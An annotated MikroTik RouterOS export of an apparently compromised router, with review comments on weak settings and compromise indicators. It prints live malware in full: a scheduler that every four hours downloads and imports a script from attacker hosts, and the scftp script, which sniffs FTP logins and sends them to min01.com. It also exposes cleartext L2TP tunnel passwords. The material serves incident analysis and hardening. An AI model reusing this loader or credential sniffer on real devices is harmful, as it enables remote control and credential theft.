- # jul/28/2019 12:24:49 by RouterOS 6.43
- #
- # model = 951Ui-2nD
- /caps-man channel
- # Three 2.4 GHz channels (2457, 2412 and 2432 MHz), 20 MHz wide, 20 dBm.
- # Only channel2 and channel3 set extension-channel=disabled; channel1 keeps the
- # default, which appears consistent with the "2457/20-eC" channel the CAP reports
- # under /interface wireless below.
- add band=2ghz-b/g/n control-channel-width=20mhz frequency=2457 name=channel1 \
- tx-power=20
- add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
- frequency=2412 name=channel2 tx-power=20
- add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
- frequency=2432 name=channel3 tx-power=20
- /interface bridge
- # LAN bridge. arp=proxy-arp makes the bridge answer ARP on behalf of addresses it can
- # route — presumably so the PPP clients that get 100.65.224.x remote-addresses under
- # /ppp secret are reachable from LAN hosts. Verify this is intended; it answers for
- # every routed prefix, not just those.
- add arp=proxy-arp name=bridge1
- /interface ethernet
- # ether1 is the WAN port (comment=Wan; it is also the masquerade out-interface and the
- # in-interface used by the WAN-facing filter rules). ether2 is the "Local" port.
- # The five entries only pin the advertised link modes; nothing else is changed.
- set [ find default-name=ether1 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Wan
- set [ find default-name=ether2 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Local
- set [ find default-name=ether3 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
- set [ find default-name=ether4 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
- set [ find default-name=ether5 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
- /interface l2tp-client
- # Two outbound L2TP client tunnels (MS-CHAPv2 only). Unlike the other secrets in this
- # paste, these credentials were NOT masked: the same password is used for both
- # tunnels with users Moscow and Moscow2. Treat them as disclosed and rotate them at
- # the far end. No use-ipsec= is exported here, so unless the default was changed these
- # tunnels carry traffic without IPsec protection.
- add allow=mschap2 connect-to=213.234.25.174 disabled=no name=\
- l2tp-out1_VLG_Merkuri password=258456 user=Moscow
- add allow=mschap2 connect-to=85.172.120.102 disabled=no name=\
- l2tp-out_VLG_Ring password=258456 user=Moscow2
- /interface wireless
- # wlan1 is managed by the CAPsMAN running on this same device (see /interface
- # wireless cap). The local ssid=MikroTik is not what clients see: the SSIDs (London,
- # AV, VIP) come from the /caps-man configuration entries below.
- # managed by CAPsMAN
- # channel: 2457/20-eC/gn(20dBm), SSID: London, CAPsMAN forwarding
- set [ find default-name=wlan1 ] ssid=MikroTik
- /caps-man datapath
- # All CAP traffic is forwarded into the LAN bridge, so every SSID below lands on the
- # same L2 segment as the wired LAN.
- add bridge=bridge1 name=datapath1
- /caps-man security
- # All three profiles still accept wpa-psk (WPA1) and TKIP next to WPA2/AES-CCM. Both
- # are deprecated and weaken the network to the weakest client; unless legacy devices
- # require them, restrict to authentication-types=wpa2-psk encryption=aes-ccm.
- # Passphrases are masked in the paste.
- add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
- group-encryption=aes-ccm name=security1 passphrase=************
- add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
- group-encryption=aes-ccm name=security2 passphrase=**********
- add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
- group-encryption=aes-ccm name=security3 passphrase=************
- /caps-man configuration
- # cfg1 (London) is the master configuration; cfg2 (AV) and cfg3 (VIP) are provisioned
- # as slaves (see /caps-man provisioning). They differ only in channel, SSID and PSK.
- add channel=channel1 datapath=datapath1 mode=ap name=cfg1 rx-chains=0,1,2 \
- security=security1 ssid=London tx-chains=0,1,2
- add channel=channel3 datapath=datapath1 mode=ap name=cfg2 rx-chains=0,1,2 \
- security=security2 ssid=AV tx-chains=0,1,2
- add channel=channel2 datapath=datapath1 mode=ap name=cfg3 rx-chains=0,1,2 \
- security=security3 ssid=VIP tx-chains=0,1,2
- /interface list
- # "discover" is the interface list used for neighbour discovery (see /ip neighbor
- # discovery-settings); dynamic interfaces such as PPP tunnels are excluded from it.
- add exclude=dynamic name=discover
- /interface wireless security-profiles
- # Only the supplicant-identity of the default profile is changed; wireless security
- # for the actual SSIDs is defined under /caps-man security.
- set [ find default=yes ] supplicant-identity=MikroTik
- /ip hotspot profile
- # Hotspot HTML directory moved to flash/; no hotspot server is defined anywhere
- # else in this export.
- set [ find default=yes ] html-directory=flash/hotspot
- /ip ipsec peer profile
- # profile_3 also allows dh-group=modp1024 (1024-bit DH), which is considered too weak
- # for current use; prefer modp2048 or stronger. profile_3 and profile_4 are not
- # referenced by any entry under /ip ipsec peer in this export and can likely be removed.
- add dh-group=modp1536 name=profile_1
- add dh-group=modp1536 name=profile_2
- add dh-group=modp1536,modp1024 name=profile_3
- add dh-group=modp1536 name=profile_4
- /queue simple
- # The name is a CP1251-escaped Cyrillic string: "Ограничение скорости" ("speed
- # limit"). Caps the whole LAN subnet 100.65.224.0/24 at 60M/60M using the default
- # per-connection (PCQ) queue types.
- add max-limit=60M/60M name=\
- "\CE\E3\F0\E0\ED\E8\F7\E5\ED\E8\E5 \F1\EA\EE\F0\EE\F1\F2\E8" queue=\
- pcq-upload-default/pcq-download-default target=100.65.224.0/24
- /caps-man manager
- # CAPsMAN runs on this device; at least its own wlan1 registers to it (see
- # /interface wireless cap).
- set enabled=yes
- /caps-man provisioning
- # Every CAP that connects is provisioned with cfg1 (London) as master and cfg2/cfg3
- # (AV, VIP) as virtual APs, named after the CAP's identity. All three share
- # datapath1, i.e. one bridge — there is no L2 separation between the SSIDs.
- add action=create-dynamic-enabled master-configuration=cfg1 name-format=\
- identity slave-configurations=cfg2,cfg3
- /interface bridge port
- # ether2–ether5 are LAN ports on bridge1; ether1 stays outside the bridge as WAN.
- # hw=no disables hardware offload on ether2/3/5 only, while ether4 keeps the default —
- # likely a leftover, since all four sit in the same bridge.
- add bridge=bridge1 hw=no interface=ether2
- add bridge=bridge1 hw=no interface=ether3
- add bridge=bridge1 hw=no interface=ether5
- add bridge=bridge1 interface=ether4
- /ip neighbor discovery-settings
- # Neighbour discovery is limited to the "discover" list (ether2 and bridge1), so it
- # is not announced on the WAN port — keep it that way.
- set discover-interface-list=discover
- /interface list member
- add interface=ether2 list=discover
- add interface=bridge1 list=discover
- /interface pptp-server server
- # PPTP server is on. PPTP with MS-CHAPv2 is cryptographically broken and should not
- # protect anything sensitive; the input chain accepts GRE and TCP/1723 from any
- # interface (see /ip firewall filter). Prefer an IPsec-based VPN, which the
- # /ip ipsec peers below already provide for the site-to-site links.
- set enabled=yes
- /interface wireless cap
- # wlan1 registers as a CAP to the CAPsMAN running on this same device (127.0.0.1).
- #
- set caps-man-addresses=127.0.0.1 enabled=yes interfaces=wlan1
- /ip address
- # LAN: 100.65.224.31/24 on bridge1. WAN: a /20 on ether1, masked in the paste — note
- # that an address which is presumably this router's public one still appears
- # unmasked as sa-src-address under /ip ipsec policy.
- add address=100.65.224.31/24 comment=Local interface=bridge1 network=\
- 100.65.224.0
- add address=***.***.****.***/20 interface=ether1 network=***.***.***.*
- /ip cloud
- # MikroTik cloud DDNS is on: the device periodically registers its public address
- # with MikroTik's servers. Disable it if the cloud hostname is not actually used.
- set ddns-enabled=yes
- /ip dns
- # allow-remote-requests=yes turns the router into a resolver for anyone who can reach
- # it. The "DNS" rule under /ip firewall filter drops UDP/53 on input from EVERY
- # interface (it has no in-interface=), so LAN clients cannot use this resolver
- # either, while TCP/53 stays reachable from the WAN because the input chain has no
- # final drop. Three of the four upstream resolvers are non-standard; confirm they are
- # intentional — swapped resolvers are a common post-compromise change, and this
- # export shows other compromise indicators (see /system scheduler, /system script).
- set allow-remote-requests=yes servers=\
- 185.121.177.177,5.189.170.196,8.8.8.8,104.238.186.189
- /ip firewall address-list
- # Both entries are disabled. allow-ip is only mentioned in the comment of the
- # disabled tarpit rule and matched by nothing; ftpgood is one of the lists written
- # by the scftp script (see /system script) — it belongs to that tooling.
- add address=127.0.0.1 disabled=yes list=allow-ip
- add address=100.65.224.33 disabled=yes list=ftpgood
- /ip firewall filter
- # NOTE(review): neither the input nor the forward chain ends in a drop. RouterOS
- # accepts what no rule matches, so every accept below is redundant and anything not
- # explicitly dropped is let in — the web proxy (63141), winbox, the PPP/IPsec services
- # and the socks port (if enabled) are all reachable from ether1, subject only to their
- # own service-level address restrictions. At minimum append
- #   add action=drop chain=input in-interface=ether1
- # after the input accepts, and for the forward chain
- #   add action=drop chain=forward connection-nat-state=!dstnat connection-state=new in-interface=ether1
- # Winbox accepted from any interface; only /ip service winbox address= limits it.
- add action=accept chain=input dst-port=8291 protocol=tcp
- # RDP forwarded in from the WAN is accepted regardless of the (disabled) dst-nat rule.
- add action=accept chain=forward dst-port=3389 in-interface=ether1 protocol=\
- tcp
- # PPTP server transport (see /interface pptp-server server).
- add action=accept chain=input comment=GRE protocol=gre
- add action=accept chain=input comment=PPTP dst-port=1723 protocol=tcp
- # SMB/445 forwarded from any interface — rarely legitimate across a WAN; remove if unused.
- add action=accept chain=forward dst-port=445 protocol=tcp
- # No in-interface= here: this also blocks LAN clients from the router's own resolver,
- # and it sits ahead of the established/related accept.
- add action=drop chain=input comment=DNS dst-port=udp dst-port=53 protocol=udp
- # Conventionally the first rule in the chain; here it follows five port-specific accepts.
- add action=accept chain=input comment=Estebleshet/Relate connection-state=\
- established,related
- add action=accept chain=forward connection-state=established,related
- # Invalid-state drop on input applies to the WAN only; the forward one is global.
- add action=drop chain=input comment=Invallid connection-state=invalid \
- in-interface=ether1
- add action=drop chain=forward connection-state=invalid
- # Remote-access (SSTP) and IPsec (IKE, NAT-T, ESP, AH) from the WAN.
- add action=accept chain=input comment=SSTP dst-port=443 in-interface=ether1 \
- protocol=tcp
- add action=accept chain=input comment=IPSEC dst-port=500,4500 in-interface=\
- ether1 protocol=udp
- add action=accept chain=input in-interface=ether1 protocol=ipsec-esp
- add action=accept chain=input in-interface=ether1 protocol=ipsec-ah
- # Disabled. Its comment refers to the allow-ip list, but the rule never matches
- # against that list.
- add action=tarpit chain=input comment=\
- "Add you ip addess to allow-ip in Address Lists." disabled=yes dst-port=\
- 30553 protocol=tcp
- /ip firewall mangle
- # Both rules are disabled. They collect FTP (port 21) destinations into the atls and
- # ftpinit address lists that the scftp script consumes (see /system script).
- # layer7-protocol=*3 is a dangling internal id — no /ip firewall layer7-protocol
- # entry exists in this export. These rules are part of the credential-harvesting
- # tooling and should be removed with it.
- add action=add-dst-to-address-list address-list=atls address-list-timeout=\
- none-dynamic chain=prerouting comment=tls disabled=yes dst-port=21 \
- layer7-protocol=*3 protocol=tcp
- add action=add-dst-to-address-list address-list=ftpinit address-list-timeout=\
- none-dynamic chain=prerouting comment=ftp disabled=yes dst-address-list=\
- !ftpok dst-port=21 protocol=tcp
- /ip firewall nat
- # The srcnat accept rules exempt the IPsec site-to-site subnets from masquerading and
- # must stay ahead of the final masquerade rule. The first one is disabled.
- add action=accept chain=srcnat comment="IPSec Volgograd ****" disabled=yes \
- dst-address=172.16.3.0/24 src-address=100.65.224.0/24
- # Disabled RDP port-forward to 100.65.224.42 (logged when active). Exposing RDP
- # directly to the WAN is high risk; if it is ever re-enabled, keep it behind the VPN.
- add action=dst-nat chain=dstnat disabled=yes dst-port=3389 log=yes protocol=\
- tcp to-addresses=100.65.224.42 to-ports=3389
- add action=accept chain=srcnat comment="IPSec Volgograd ****" dst-address=\
- 10.8.0.0/24 src-address=100.65.224.0/24
- add action=accept chain=srcnat comment="IPSec ****" dst-address=\
- 192.168.1.0/24 src-address=100.65.224.0/24
- add action=masquerade chain=srcnat comment=Masquerade out-interface=ether1
- /ip ipsec peer
- # Three site-to-site peers in main-l2tp exchange mode; addresses and pre-shared
- # secrets are masked in the paste. The first two are passive (responder only), the
- # third initiates. Rotate the secrets regardless — this export comes from a device
- # with clear compromise indicators (see /system scheduler).
- add address=***.**.***.***/32 comment="***** IPSEC" exchange-mode=main-l2tp \
- generate-policy=port-override passive=yes profile=profile_1 secret=\
- *******
- add address=***.***.**.***/32 comment=VOLGOGRAD_IPSEC exchange-mode=main-l2tp \
- generate-policy=port-override passive=yes profile=profile_2 secret=\
- ********
- add address=**.**.**.**/32 comment=Ring exchange-mode=main-l2tp \
- generate-policy=port-override profile=profile_2 secret=*********
- /ip ipsec policy
- # sa-src-address=178.236.241.126 is an unmasked local address — presumably the WAN
- # address that was masked under /ip address. The second policy (172.16.3.0/24) is
- # disabled, matching the disabled srcnat exemption for the same subnet.
- add dst-address=10.8.0.0/24 sa-dst-address=213.234.25.92 sa-src-address=\
- 178.236.241.126 src-address=100.65.224.0/24 tunnel=yes
- add disabled=yes dst-address=172.16.3.0/24 sa-dst-address=85.172.120.102 \
- sa-src-address=**.**.***.*** src-address=100.65.224.0/24 tunnel=yes
- /ip proxy
- # The HTTP proxy is enabled on the non-default port 63141. The single access rule has
- # no match criteria and action=deny, i.e. it rejects every request, but with no final
- # drop in the input chain the port itself stays reachable from the WAN. If the proxy
- # is not needed, set enabled=no — an enabled proxy on an unusual port is a frequent
- # post-compromise artefact on RouterOS devices.
- set enabled=yes port=63141
- /ip proxy access
- add action=deny comment=sysadminpxy
- /ip route
- # Default route out of ether1 (gateway given as the interface). Two static routes to
- # remote subnets via 172.16.40.1 / 172.16.30.1 — presumably the far ends of the L2TP
- # client tunnels — sourced from the LAN address so replies come back over the tunnel.
- add distance=1 gateway=ether1
- add distance=1 dst-address=172.16.3.0/24 gateway=172.16.40.1 pref-src=\
- 100.65.224.31
- add distance=1 dst-address=172.17.2.0/24 gateway=172.16.30.1 pref-src=\
- 100.65.224.31
- /ip service
- # Good: telnet, ftp, www, ssh, api and api-ssl are disabled and winbox is limited to
- # four sources (the two IPsec/L2TP peers, the LAN subnet and one external host).
- # Winbox is therefore the only management path; www-ssl is not mentioned and keeps
- # its default.
- set telnet disabled=yes
- set ftp disabled=yes
- set www disabled=yes
- set ssh disabled=yes
- set api disabled=yes
- set winbox address=\
- 213.234.25.92/32,85.172.120.102/32,100.65.224.0/24,93.94.221.180/32
- set api-ssl disabled=yes
- /ip socks
- # Only the port was changed (27182); no enabled=yes is exported, so the service is
- # presumably off — confirm with /ip socks print. A socks proxy on an odd port is a
- # well-known post-compromise change on RouterOS devices; keep it disabled.
- set port=27182
- /ppp secret
- # Three PPP accounts with fixed LAN remote-addresses; names and passwords are masked
- # in the paste (the mask length need not reflect the real length). Disp2 sets no
- # service= and therefore accepts any PPP service. Rotate all of them given the
- # compromise indicators under /system scheduler and /system script.
- add local-address=100.65.224.31 name=****************** password=\
- ***************** remote-address=100.65.224.36 service=pptp
- add local-address=100.65.224.31 name=Disp password=*** remote-address=\
- 100.65.224.35 service=pptp
- add local-address=100.65.224.31 name=Disp2 password=**** remote-address=\
- 100.65.224.38
- /system clock
- # Time zone and NTP matter for the scheduler timestamps below and for correlating
- # logs; NTP is pinned to two fixed servers.
- set time-zone-name=Europe/Moscow
- /system identity
- set name="MikroTIik Gateway"
- /system ntp client
- set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
- /system routerboard settings
- # silent-boot=no is the default (boot beeps/LEDs stay on).
- set silent-boot=no
- /system scheduler
- # NOTE(review): the four entries below are not administration; they are a
- # persistence mechanism matching the pattern reported on many compromised RouterOS
- # devices. All run with full policy (incl. password, sensitive, sniff):
- #  * Auto113 — daily at 03:11 removes a scheduler named upd111 (not present in this
- #    export) and reboots the router.
- #  * upd112 — at every boot removes a scheduler named sh113 (not present) and the
- #    file u113.rsc.
- #  * upd113 — every 4 h downloads a script from min01.net, mikr0tik.com or gotan.bit
- #    (port 31416, fixed key= parameter), saves it as u113.rsc, /import's it and
- #    deletes the file: whoever controls those hosts can run arbitrary commands on this
- #    router every four hours.
- #  * shftp — every minute makes sure the scftp script (the FTP credential sniffer
- #    under /system script) is running.
- # Deleting these entries is necessary but not sufficient: assume the admin password
- # and every secret in this export were taken, change them, upgrade RouterOS, and
- # review /ip dns, /ip proxy, /ip socks, /tool sniffer and /file for leftovers.
- add interval=1d name=Auto113 on-event=\
- "/system scheduler remove [find name=upd111]\r\
- \n/system reboot" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
- sep/16/2018 start-time=03:11:00
- add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
- \n:do {/file remove u113.rsc} on-error={}" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
- startup
- add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:\
- 31416/min01\?key=FK7Yzw9S2pFAVP&port={vport}\" mode=http dst-path=u113.rsc\
- } on-error={}\r\
- \n:do {/tool fetch url=\"http://mikr0tik.com:31416/min01\?key=FK7Yzw9S2pFA\
- VP&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
- \n:do {/tool fetch url=\"http://gotan.bit:31416/min01\?key=FK7Yzw9S2pFAVP&\
- port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
- \n:do {/import u113.rsc} on-error={}\r\
- \n:do {/file remove u113.rsc} on-error={}" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
- oct/31/2018 start-time=04:58:07
- add interval=1m name=shftp on-event=":if ([:len [/system script job find scrip\
- t =\"scftp\"]] != 1) do={/system script job remove [/system script job fin\
- d script =\"scftp\"];:execute \"scftp\"};" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
- startup
- /system script
- # NOTE(review): scftp is a credential harvester, not a maintenance script. In an
- # endless loop it takes each address in the ftpinit list (fed by the mangle rules),
- # runs /tool sniffer on port 21 for that host into <ip>.txt for up to about two
- # minutes, stops it, searches the capture for "USER " and "PASS ", and — if either
- # was found and both are under 40 characters — sends the address, user and password
- # by HTTP request to min01.com:31418, marks the host ftpgood and deletes the capture.
- # Runs as admin with sniff/password/sensitive policy and is restarted every minute by
- # the shftp scheduler entry. Any FTP login that crossed this router since at least
- # sep/16/2018 (earliest start-date under /system scheduler) should be treated as
- # stolen. Remove the script, the shftp entry and the mangle rules, stop the sniffer,
- # and delete the leftover .txt captures under /file.
- add dont-require-permissions=no name=scftp owner=admin policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":do {/t\
- ool sniffer stop} on-error={}\r\
- \nwhile (true) do={\r\
- \nforeach i in=[/ip firewall address-list find where list=atls or list=ftp\
- good] do={\r\
- \n:local ipftp [/ip firewall address-list get \$i address] \r\
- \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
- dress=\$ipftp]} on-error={}\r\
- \n:do {/ip firewall address-list remove [find where list=\"ftpok\" && addr\
- ess=\$ipftp]} on-error={}\r\
- \n:do {/ip firewall address-list remove [find where list=\"atls\" && addre\
- ss=\$ipftp]} on-error={}\r\
- \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
- \n}\r\
- \nforeach i in=[/ip firewall address-list find list=ftpinit] do={\r\
- \n:local ipftp [/ip firewall address-list get \$i address]\r\
- \n:do {/tool sniffer set file-limit=200KiB file-name=(\$ipftp.\".txt\") fi\
- lter-interface=all filter-ip-address=\$ipftp filter-port=21 streaming-enab\
- led=no memory-scroll=no} on-error={}\r\
- \n:do {/tool sniffer start} on-error={}\r\
- \n:do {/ip firewall address-list add address=\$ipftp list=ftpok timeout=2h\
- } on-error={}\r\
- \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
- dress=\$ipftp]} on-error={}\r\
- \n:local len0 0\r\
- \n:local len1 0\r\
- \n:local file0 \"\"\r\
- \n:local file1 \"\"\r\
- \n:local minute\r\
- \n:set \$minute ([:pick [/sys clock get time] 3 5]+2)\r\
- \nif (\$minute>59) do={:set \$minute (\$minute-60)}\r\
- \n:do {\r\
- \n:set \$len0 \$len1\r\
- \n:set \$file0 \$file1 \r\
- \n:do {:set \$file1 [/file get (\$ipftp.\".txt\") contents]} on-error={}\r\
- \n:set \$len1 [:len \$file1]\r\
- \n} while=(!((\$len0!=\$len1 and \$len1=0) or ([:tonum [:pick [/sys clock \
- get time] 3 5]]=\$minute)))\r\
- \n:do {/tool sniffer stop} on-error={}\r\
- \n:set \$pUSER [:find \$file0 \"USER \" -1]\r\
- \n:set \$pPASS [:find \$file0 \"PASS \" -1]\r\
- \n:local user \"\"\r\
- \n:local pass \"\"\r\
- \nif (\$pUSER>0) do={\r\
- \n:set \$pUSER (\$pUSER+5)\r\
- \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
- \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pUSER<\$len0) do={\r\
- \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
- \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
- \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
- \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
- \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
- \n:set \$user (\$user.\$ch)\r\
- \n:set \$pUSER (\$pUSER+1)\r\
- \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
- \n}}\r\
- \nif (\$pPASS>0) do={\r\
- \n:set \$pPASS (\$pPASS+5)\r\
- \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
- \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pPASS<\$len0) do={\r\
- \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
- \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
- \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
- \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
- \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
- \n:set \$pass (\$pass.\$ch)\r\
- \n:set \$pPASS (\$pPASS+1)\r\
- \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
- \n}}\r\
- \nif ([:len \$user]!=0 or [:len \$pass]!=0) do={\r\
- \nif ([:len \$user]<40 && [:len \$pass]<40) do={\r\
- \n:do {/ip firewall address-list add address=\$ipftp list=ftpgood} on-erro\
- r={}\r\
- \n:do {/tool fetch url=(\"http://min01.com:31418/ftp\?ipftp=\".\$ipftp.\"&\
- user=\".\$user.\"&pass=\".\$pass) mode=http keep-result=no} on-error={}\r\
- \n}}\r\
- \n:delay 1s\r\
- \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
- \n}\r\
- \n:delay 1s\r\
- \n}\r\
- \n"
- /tool sniffer
- # Sniffer state left behind by the scftp script's last run: FTP traffic for
- # 178.236.242.74 captured into a file, presumably a destination some LAN client
- # logged in to. Stop it (/tool sniffer stop), reset the filter and delete the
- # leftover <ip>.txt files under /file.
- set file-limit=200KiB file-name=178.236.242.74.txt filter-interface=all \
- filter-ip-address=178.236.242.74/32 filter-port=ftp memory-scroll=no